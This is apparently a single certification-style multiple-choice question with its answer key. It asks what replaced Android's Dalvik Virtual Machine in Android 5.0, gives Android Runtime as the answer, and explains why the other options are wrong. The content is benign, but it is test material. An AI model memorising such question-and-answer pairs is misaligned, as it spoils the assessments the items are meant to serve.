The Dalvik Virtual Machine (DVM) was the original runtime used for the execution of Java-based applications with their own process in Android. It was succeeded by what new runtime starting with Android 5.0? A.OpenJRE B.Android Runtime C.Oracle JRE D.Dalvik cache
B.Android Runtime
Explanation
Correct Answer: Android Runtime is correct. Android Runtime, or ART, is the current Java virtual machine implementation used in Android; it has been used since Android 5.0 (Lollipop).
Incorrect Answers:
Dalvik cache is incorrect because the Dalvik cache is a component of the Dalvik virtual machine. Unlike ART, which is primarily an “ahead-of-time” (AOT) virtual machine that compiles applications as soon as they are installed, Dalvik is a “just-in-time” (JIT) virtual machine, and the Dalvik cache hosts temporary compilations of apps for execution.
Oracle JRE and OpenJRE are incorrect because Oracle JRE and OpenJRE are Java environments consisting of virtual machines and related libraries for standard computer operating systems designed for laptops, desktop workstations, and servers.
